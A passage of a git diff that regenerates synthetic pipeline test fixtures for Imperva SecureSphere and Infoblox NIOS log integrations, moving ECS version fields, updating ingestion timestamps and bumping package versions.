18:53:40,srvGroup=loinv,service=umd,appName=madmi,event#=xercit,eventType=Login,usrGroup=avolup,usrAuth=True,application=\"etdo\",osUsername=tuserror,srcHost=nisiutal4437.www.example,dbName=uipex,schemaName=ditautf,bindVar=orr,sqlError=failure,respSize=4367,respTime=25.972000,affRows=uptas,action=\"cancel\",rawQuery=\"osquira\"", "event": { - "ingested": "2021-06-09T11:17:04.826171400Z" + "ingested": "2021-12-14T14:46:55.618583260Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.146.131.76,dstPort=2281,dbUsername=orsi,srcIP=10.173.19.140,srcPort=7780,creatTime=2019-07-10 01:56:14,srvGroup=atu,service=ddo,appName=veli,event#=ata,eventType=Logout,usrGroup=untmoll,usrAuth=False,application=\"ididun\",osUsername=olo,srcHost=tqui5172.www.local,dbName=untex,schemaName=Except,bindVar=elitsedd,sqlError=failure,respSize=5844,respTime=52.550000,affRows=cingel,action=\"allow\",rawQuery=\"seos\"", "event": { - "ingested": "2021-06-09T11:17:04.826175100Z" + "ingested": "2021-12-14T14:46:55.618583653Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.69.5.227,dstPort=5845,dbUsername=doloreme,srcIP=10.171.175.165,srcPort=5776,creatTime=2019-07-24 08:58:48,srvGroup=taspe,service=litess,appName=enimadm,event#=corpori,eventType=onemull,usrGroup=emeu,usrAuth=uisaute,application=\"tvol\",osUsername=ntocc,srcHost=intocca6708.mail.corp,dbName=dquiaco,schemaName=rumw,bindVar=ula,sqlError=failure,respSize=5201,respTime=46.690000,affRows=quam,action=\"deny\",rawQuery=\"edquian\"", "event": { - "ingested": "2021-06-09T11:17:04.826179100Z" + "ingested": "2021-12-14T14:46:55.618584051Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.213.214.118,dstPort=7851,dbUsername=ate,srcIP=10.253.175.129,srcPort=5547,creatTime=7 August 2019 16:01:23,srvGroup=rsi,service=tuser,appName=equinesc,event#=ectet,eventType=Login,usrGroup=emull,usrAuth=False,application=\"enatuser\",osUsername=epteurs,srcHost=isetqu2843.www.invalid,dbName=niamqu,schemaName=nrep,bindVar=lauda,sqlError=failure,respSize=6260,respTime=9.295000,affRows=aincidu,action=\"deny\",rawQuery=\"ipsamvol\"", "event": { - "ingested": "2021-06-09T11:17:04.826190500Z" + "ingested": "2021-12-14T14:46:55.618584450Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=estquido,event#=eufugiat,createTime=2019-08-21 23:03:57,updateTime=minima,alertSev=high,group=bor,ruleName=\"uisnos\",evntDesc=\"loi\",category=tation,disposition=seddoe,eventType=adol,proto=rdp,srcPort=7756,srcIP=10.149.91.130,dstPort=3548,dstIP=10.89.26.170,policyName=\"aqueipsa\",occurrences=5863,httpHost=ide,webMethod=atcupi,url=\"https://www.example.com/sit/ugi.gif?sitametc=rur#edut\",webQuery=\"sitametc\",soapAction=iarchite,resultCode=uide,sessionID=iono,username=aboris,addUsername=eturad,responseTime=ipiscive,responseSize=sequu,direction=internal,dbUsername=epteur,queryGroup=iqu,application=\"uptateve\",srcHost=commodo6041.mail.localhost,osUsername=atus,schemaName=orumetMa,dbName=inventor,hdrName=dolo,action=block", "event": { - "ingested": "2021-06-09T11:17:04.826197700Z" + "ingested": "2021-12-14T14:46:55.618584905Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=tmolli,event#=orumSe,createTime=2019-09-05 06:06:31,updateTime=mSe,alertSev=high,group=teturad,ruleName=\"alorumwr\",evntDesc=\"pis\",category=idol,disposition=mmodico,eventType=emaccu,proto=rdp,srcPort=5818,srcIP=10.52.106.68,dstPort=856,dstIP=10.81.108.232,policyName=\"atemq\",occurrences=5098,httpHost=volupta,webMethod=Quisaut,url=\"https://internal.example.net/obeatae/sedqui.jpg?nulap=onseq#amrem\",webQuery=\"plicab\",soapAction=isisten,resultCode=eiusmodt,sessionID=naaliq,username=aco,addUsername=psamvolu,responseTime=inculp,responseSize=eni,direction=inbound,dbUsername=sedqu,queryGroup=ipitlabo,application=\"olorinr\",srcHost=gitse6744.api.local,osUsername=neavolup,schemaName=uaturve,dbName=lapa,hdrName=uepor,action=\"allow\",errormsg=\"failure\"", "event": { - "ingested": "2021-06-09T11:17:04.826203100Z" + "ingested": "2021-12-14T14:46:55.618585296Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=umquamei,event#=nih,createTime=2019-09-19 13:09:05,updateTime=tionev,alertSev=high,group=quia,ruleName=\"eabill\",evntDesc=\"itatiset\",category=uaerat,disposition=met,eventType=isno,proto=icmp,srcPort=2572,srcIP=10.230.48.97,dstPort=1991,dstIP=10.223.10.28,policyName=\"emveleu\",occurrences=4029,httpHost=norumet,webMethod=tconse,url=\"https://mail.example.com/iaturE/inc.htm?uisaut=mnihilm#itinvo\",webQuery=\"lestia\",soapAction=anti,resultCode=eavo,sessionID=enderi,username=erit,addUsername=uptatem,responseTime=reeufug,responseSize=temveleu,direction=unknown,dbUsername=repre,queryGroup=consec,application=\"untmoll\",srcHost=par3605.internal.localdomain,osUsername=usmodte,schemaName=untex,dbName=ommodi,hdrName=ntiu,action=\"deny\",errormsg=\"success\"", "event": { - "ingested": "2021-06-09T11:17:04.826207600Z" + "ingested": "2021-12-14T14:46:55.618585676Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.115.42.231,dstPort=2143,dbUsername=res,srcIP=10.161.212.150,srcPort=2748,creatTime=3 October 2019 20:11:40,srvGroup=corporis,service=turExc,appName=urvelil,event#=ulapa,eventType=Login,usrGroup=abi,usrAuth=False,application=\"ameiusm\",osUsername=tasnul,srcHost=isau4356.www.home,dbName=niamqui,schemaName=sequamn,bindVar=onse,sqlError=failure,respSize=4846,respTime=6.993000,affRows=aliquaUt,action=\"deny\",rawQuery=\"natus\"", "event": { - "ingested": "2021-06-09T11:17:04.826212Z" + "ingested": "2021-12-14T14:46:55.618586084Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=emp,event#=suscipit,createTime=2019-10-18 03:14:14,updateTime=iaconseq,alertSev=medium,group=sciuntNe,ruleName=\"nevo\",evntDesc=\"stiaec\",category=officia,disposition=ametcon,eventType=gnid,proto=ipv6,srcPort=5677,srcIP=10.226.75.20,dstPort=3896,dstIP=10.247.108.144,policyName=\"iutaliqu\",occurrences=3711,httpHost=onsectet,webMethod=iat,url=\"https://www5.example.org/elaud/temsequ.htm?dolo=iciatisu#eip\",webQuery=\"iquaUte\",soapAction=aborumSe,resultCode=writt,sessionID=dent,username=tema,addUsername=saquaeab,responseTime=rpo,responseSize=inr,direction=internal,dbUsername=edquiac,queryGroup=olore,application=\"urEx\",srcHost=labo3477.www5.domain,osUsername=maccusan,schemaName=fugia,dbName=psa,hdrName=iset,action=\"block\",errormsg=\"success\"", "event": { - "ingested": "2021-06-09T11:17:04.826215900Z" + "ingested": "2021-12-14T14:46:55.618586474Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.192.15.65,dstPort=3328,dbUsername=nimides,srcIP=10.97.22.61,srcPort=6420,creatTime=2019-11-01 10:16:48,srvGroup=labor,service=quelaud,appName=ira,event#=gna,eventType=aparia,usrGroup=ntoreve,usrAuth=remips,application=\"uptatemU\",osUsername=illumd,srcHost=itseddo2209.mail.domain,dbName=olu,schemaName=rExcep,bindVar=turExcep,sqlError=success,respSize=4173,respTime=166.270000,affRows=duntutla,action=\"block\",rawQuery=\"tmollit\"", "event": { - "ingested": "2021-06-09T11:17:04.826222300Z" + "ingested": "2021-12-14T14:46:55.618586934Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=venia,event#=Loremi,createTime=2019-11-15 17:19:22,updateTime=uisnostr,alertSev=medium,group=vol,ruleName=\"ommodi\",evntDesc=\"ritat\",category=dipi,disposition=asnulapa,eventType=atev,proto=tcp,srcPort=7469,srcIP=10.197.254.133,dstPort=2009,dstIP=10.116.76.161,policyName=\"tla\",occurrences=2608,httpHost=ender,webMethod=quid,url=\"https://mail.example.net/teturad/nimide.htm?ueporroq=writ#ema\",webQuery=\"ioffici\",soapAction=agni,resultCode=tat,sessionID=metconse,username=ide,addUsername=equu,responseTime=pernatur,responseSize=orem,direction=outbound,dbUsername=caecatc,queryGroup=iarc,application=\"emquia\",srcHost=duntutl3396.api.host,osUsername=idu,schemaName=trudex,dbName=ncul,hdrName=mcorpor,action=cancel", "event": { - "ingested": "2021-06-09T11:17:04.826226200Z" + "ingested": "2021-12-14T14:46:55.618587326Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.28.77.79,dstPort=3615,dbUsername=upta,srcIP=10.144.14.15,srcPort=1150,creatTime=30 November 2019 00:21:57,srvGroup=consequ,service=min,appName=riame,event#=gnaal,eventType=Login,usrGroup=nti,usrAuth=True,application=\"tetura\",osUsername=utlab,srcHost=colabo6686.internal.invalid,dbName=uptass,schemaName=rspic,bindVar=itsedq,sqlError=success,respSize=4810,respTime=22.348000,affRows=iut,action=\"deny\",rawQuery=\"nemu\"", "event": { - "ingested": "2021-06-09T11:17:04.826230Z" + "ingested": "2021-12-14T14:46:55.618587719Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.248.177.182,dstPort=317,dbUsername=quei,srcIP=10.18.15.43,srcPort=2224,creatTime=2019-12-14 07:24:31,srvGroup=reetdol,service=umtotam,appName=itaedi,event#=ant,eventType=tiumt,usrGroup=taedicta,usrAuth=mveniamq,application=\"exerci\",osUsername=quaturve,srcHost=tsunti1164.www.example,dbName=equatur,schemaName=caecat,bindVar=oreetd,sqlError=unknown,respSize=983,respTime=113.318000,affRows=nderit,action=\"accept\",rawQuery=\"icer\"", "event": { - "ingested": "2021-06-09T11:17:04.826234Z" + "ingested": "2021-12-14T14:46:55.618588103Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/imperva/manifest.yml b/packages/imperva/manifest.yml index e0da10029f9..e67d8cf562a 100644 --- a/packages/imperva/manifest.yml +++ b/packages/imperva/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: imperva title: Imperva SecureSphere Logs -version: 0.6.0 +version: 0.6.1 description: Collect SecureSphere logs from Imperva devices with Elastic Agent. categories: ["network", "security"] release: experimental diff --git a/packages/infoblox/changelog.yml b/packages/infoblox/changelog.yml index c576154cfa7..0fb56753174 100644 --- a/packages/infoblox/changelog.yml +++ b/packages/infoblox/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.6.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.6.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/infoblox/data_stream/nios/_dev/test/pipeline/test-generated.log-expected.json b/packages/infoblox/data_stream/nios/_dev/test/pipeline/test-generated.log-expected.json index 14934a276ac..427f3dbfc48 100644 --- a/packages/infoblox/data_stream/nios/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/infoblox/data_stream/nios/_dev/test/pipeline/test-generated.log-expected.json @@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "January 29 06:09:59 doeiu3942.localdomain -:rc executing eporr start", "event": { - "ingested": "2021-06-09T11:22:12.539379200Z" + "ingested": "2021-12-14T14:46:58.554771620Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 12 13:12:33 tia7019.www.invalid :diskcheck quis", "event": { - "ingested": "2021-06-09T11:22:12.539402700Z" + "ingested": "2021-12-14T14:46:58.554776423Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 26 20:15:08 dolo1720.api.example 10.250.162.122 logger: com", "event": { - "ingested": "2021-06-09T11:22:12.539410100Z" + "ingested": "2021-12-14T14:46:58.554777474Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 12 03:17:42 ratio1111.localdomain -:diskcheck atio", "event": { - "ingested": "2021-06-09T11:22:12.539418100Z" + "ingested": "2021-12-14T14:46:58.554778246Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 26 10:20:16 tconsec5932.mail.domain shutdown[uam]: shutting down for system reboot", "event": { - "ingested": "2021-06-09T11:22:12.539424200Z" + "ingested": "2021-12-14T14:46:58.554778783Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 9 17:22:51 llu4762.mail.localdomain snmptrapd[scivel]: NET-SNMP version 1.5695 aperi", "event": { - "ingested": "2021-06-09T11:22:12.539429600Z" + "ingested": "2021-12-14T14:46:58.554779301Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 24 00:25:25 estqui6557.www.localhost -:syslog-ng equuntu", "event": { - "ingested": "2021-06-09T11:22:12.539435200Z" + "ingested": "2021-12-14T14:46:58.554779839Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 08 07:27:59 mcolabor1656.www5.corp netauto_discovery[giatq]: quid:fug(uatDuis)10.68.114.91/veri: SNMP Credentials: Failed to authenticate", "event": { - "ingested": "2021-06-09T11:22:12.539440300Z" + "ingested": "2021-12-14T14:46:58.554780345Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 22 14:30:33 exercit4665.internal.domain -:scheduled_ftp_backups Scheduled backup to the eetd was successful - Backup file eip", "event": { - "ingested": "2021-06-09T11:22:12.539445200Z" + "ingested": "2021-12-14T14:46:58.554781176Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 5 21:33:08 iutal13.api.localdomain python[eacomm]: Utenimad: nibusBon.ehend [ueipsaqu]: Populated uidolore niamqu222.localdomain DnsView=tevelit", "event": { - "ingested": "2021-06-09T11:22:12.539450100Z" + "ingested": "2021-12-14T14:46:58.554781894Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 20 04:35:42 boree6686.www5.host ntpd[iinea]: ipit", "event": { - "ingested": "2021-06-09T11:22:12.539456300Z" + "ingested": "2021-12-14T14:46:58.554782386Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 4 11:38:16 itlabori2344.mail.invalid -:openvpn-member OpenVPN 1.4105 [icmp] [aper] essequ", "event": { - "ingested": "2021-06-09T11:22:12.539461500Z" + "ingested": "2021-12-14T14:46:58.554783401Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 18 18:40:50 tessec3539.home nsect: rc6 ntutl", "event": { - "ingested": "2021-06-09T11:22:12.539466400Z" + "ingested": "2021-12-14T14:46:58.554784063Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2 01:43:25 siuta2896.www.localhost -:ntpd ntpd exiting on signal 2946", "event": { - "ingested": "2021-06-09T11:22:12.539471300Z" + "ingested": "2021-12-14T14:46:58.554788807Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 16 08:45:59 strude910.internal.local pidof[ittenbyC]: can't read sid from aperi", "event": { - "ingested": "2021-06-09T11:22:12.539476200Z" + "ingested": "2021-12-14T14:46:58.554789617Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 30 15:48:33 lores1409.www.home :sSMTP etc", "event": { - "ingested": "2021-06-09T11:22:12.539480900Z" + "ingested": "2021-12-14T14:46:58.554790284Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 13 22:51:07 nimadmin1493.www5.example rc3[lpa]: entsu", "event": { - "ingested": "2021-06-09T11:22:12.539485700Z" + "ingested": "2021-12-14T14:46:58.554791187Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 28 05:53:42 mqui4683.www.localhost tasuntex: kernel sunt", "event": { - "ingested": "2021-06-09T11:22:12.539490400Z" + "ingested": "2021-12-14T14:46:58.554791894Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 12 12:56:16 incidi2966.www.test controld[olupt]: Distribution Complete", "event": { - "ingested": "2021-06-09T11:22:12.539495200Z" + "ingested": "2021-12-14T14:46:58.554792542Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 26 19:58:50 ugiatnu5252.internal.localdomain -:syslog erc", "event": { - "ingested": "2021-06-09T11:22:12.539500300Z" + "ingested": "2021-12-14T14:46:58.554793172Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 10 03:01:24 aperia4409.www5.invalid :controld Distribution Started", "event": { - "ingested": "2021-06-09T11:22:12.539505400Z" + "ingested": "2021-12-14T14:46:58.554793829Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 24 10:03:59 emagnama4259.example 10.206.136.206 dhcpd: Average suntinc dynamic DNS update latency: success micro seconds", "event": { - "ingested": "2021-06-09T11:22:12.539510400Z" + "ingested": "2021-12-14T14:46:58.554794401Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 8 17:06:33 isno2228.home nnu: smart_check_io dolo", "event": { - "ingested": "2021-06-09T11:22:12.539515100Z" + "ingested": "2021-12-14T14:46:58.554795374Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 23 00:09:07 amvolup7700.www5.corp 10.19.194.101 rsyncd: rsync on orinrepr from conse2991.internal.lan (10.116.104.101)", "event": { - "ingested": "2021-06-09T11:22:12.539520700Z" + "ingested": "2021-12-14T14:46:58.554796153Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 6 07:11:41 tat7551.internal.local rc6[itinvo]: mdolore", "event": { - "ingested": "2021-06-09T11:22:12.539525900Z" + "ingested": "2021-12-14T14:46:58.554796839Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 20 14:14:16 siarchi2289.mail.lan debug_mount[olupta]: mount mipsumd", "event": { - "ingested": "2021-06-09T11:22:12.539530900Z" + "ingested": "2021-12-14T14:46:58.554797571Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 3 21:16:50 remi2114.local ionevo: ntpd ntpd exiting on signal 3219", "event": { - "ingested": "2021-06-09T11:22:12.539536Z" + "ingested": "2021-12-14T14:46:58.554798212Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 18 04:19:24 dolor2707.api.localhost httpd[commod]: 2017-2-18 4:19:24.adol [doloremi]: Login_Denied - - to=luptasn ip=10.153.111.103 info=itquiin", "event": { - "ingested": "2021-06-09T11:22:12.539541700Z" + "ingested": "2021-12-14T14:46:58.554799237Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 4 11:21:59 que651.www5.host init[etconse]: tincu", "event": { - "ingested": "2021-06-09T11:22:12.539546700Z" + "ingested": "2021-12-14T14:46:58.554800390Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Mar 18 18:24:33 asun1250.api.localdomain DIS[oluptate]: onseq:serunt: Deviceaquaeabi/10.171.157.74login failurefailure", "event": { - "ingested": "2021-06-09T11:22:12.539551800Z" + "ingested": "2021-12-14T14:46:58.554801179Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2 01:27:07 ento4488.www5.localhost :rc6 eriamea", "event": { - "ingested": "2021-06-09T11:22:12.539557300Z" + "ingested": "2021-12-14T14:46:58.554801933Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 16 08:29:41 pisciv7108.lan 10.140.136.44 named: client 10.31.14.36#2285/key dhcp_updater_default: signer \"vitaedi\" approved", "event": { - "ingested": "2021-06-09T11:22:12.539562200Z" + "ingested": "2021-12-14T14:46:58.554802572Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 30 15:32:16 veniamq1608.www.localdomain colab: diskcheck ommodico", "event": { - "ingested": "2021-06-09T11:22:12.539566900Z" + "ingested": "2021-12-14T14:46:58.554803371Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 14 22:34:50 tin183.api.corp netauto_discovery[sperna]: eabilloi:estia(tper)10.163.5.243/osqui: SNMP Credentials: Failed to authenticate", "event": { - "ingested": "2021-06-09T11:22:12.539574Z" + "ingested": "2021-12-14T14:46:58.554804060Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 29 05:37:24 fdeFi1123.api.domain INFOBLOX-Grid[etdol]: Started distribution on member with IP address 10.177.36.38", "event": { - "ingested": "2021-06-09T11:22:12.539579200Z" + "ingested": "2021-12-14T14:46:58.554805032Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 12 12:39:58 aevit37.www5.test ati: kernel Linux version 1.6668 (gel) (lorsitam) mpo", "event": { - "ingested": "2021-06-09T11:22:12.539584Z" + "ingested": "2021-12-14T14:46:58.554805700Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 26 19:42:33 aliquam1364.api.corp -:syslog eratv", "event": { - "ingested": "2021-06-09T11:22:12.539588700Z" + "ingested": "2021-12-14T14:46:58.554806448Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 11 02:45:07 uir1374.mail.domain -:smart_check_io quiratio", "event": { - "ingested": "2021-06-09T11:22:12.539593300Z" + "ingested": "2021-12-14T14:46:58.554807196Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 25 09:47:41 nse2256.www.localdomain equat: db_jnld Resolved conflict for replicated delete of TXT \"derit\" in zone \"dexea\"", "event": { - "ingested": "2021-06-09T11:22:12.539598Z" + "ingested": "2021-12-14T14:46:58.554808150Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 8 16:50:15 lapar1024.www5.local intocc: sSMTP Unable to locate liqu2936.api.localdomain.", "event": { - "ingested": "2021-06-09T11:22:12.539602800Z" + "ingested": "2021-12-14T14:46:58.554808893Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 22 23:52:50 tDuisaut3296.www.invalid scheduled_ftp_backups[imvenia]: Scheduled backup to the spi was successful - Backup file stquido", "event": { - "ingested": "2021-06-09T11:22:12.539607400Z" + "ingested": "2021-12-14T14:46:58.554809651Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 6 06:55:24 upta3300.www.home 10.233.48.103 diskcheck: leumiur", "event": { - "ingested": "2021-06-09T11:22:12.539612Z" + "ingested": "2021-12-14T14:46:58.554810513Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 20 13:57:58 vita2681.www5.local tobea: controld Distribution Complete", "event": { - "ingested": "2021-06-09T11:22:12.539616700Z" + "ingested": "2021-12-14T14:46:58.554811196Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 4 21:00:32 ersp3536.www5.lan 10.93.90.240 rsyncd: sent 1792 bytes received 7387 bytes total size tes", "event": { - "ingested": "2021-06-09T11:22:12.539621500Z" + "ingested": "2021-12-14T14:46:58.554811897Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Oct 19 04:03:07 tnulapa7592.www.local DIS[eriti]: litessec: itas: Attempting discover-now for 10.251.106.205 on mporin, using session ID", "event": { - "ingested": "2021-06-09T11:22:12.539626300Z" + "ingested": "2021-12-14T14:46:58.554812598Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 2 11:05:41 roid6604.www.test -:syslog Nemoenim", "event": { - "ingested": "2021-06-09T11:22:12.539631Z" + "ingested": "2021-12-14T14:46:58.554813364Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 16 18:08:15 nihil657.domain validate_dhcpd[rsitv]: iciade", "event": { - "ingested": "2021-06-09T11:22:12.539635900Z" + "ingested": "2021-12-14T14:46:58.554814234Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 1 01:10:49 ven660.api.lan amnih: watchdog cancel, pid = 3981", "event": { - "ingested": "2021-06-09T11:22:12.539640600Z" + "ingested": "2021-12-14T14:46:58.554815049Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 15 08:13:24 atatn7364.internal.localdomain debug_mount[ofdeFin]: mount essequam", "event": { - "ingested": "2021-06-09T11:22:12.539645400Z" + "ingested": "2021-12-14T14:46:58.554815788Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 29 15:15:58 umqu301.internal.home init[inesci]: isnisi", "event": { - "ingested": "2021-06-09T11:22:12.539662500Z" + "ingested": "2021-12-14T14:46:58.554816519Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 12 22:18:32 riamea1540.www.host -:ntpd_initres ntpd exiting on signal 15", "event": { - "ingested": "2021-06-09T11:22:12.539668900Z" + "ingested": "2021-12-14T14:46:58.554817491Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 27 05:21:06 siut5663.local piscinge: rcsysinit fsck from 1.271", "event": { - "ingested": "2021-06-09T11:22:12.539674300Z" + "ingested": "2021-12-14T14:46:58.554818273Z" + }, + "ecs": { + "version": 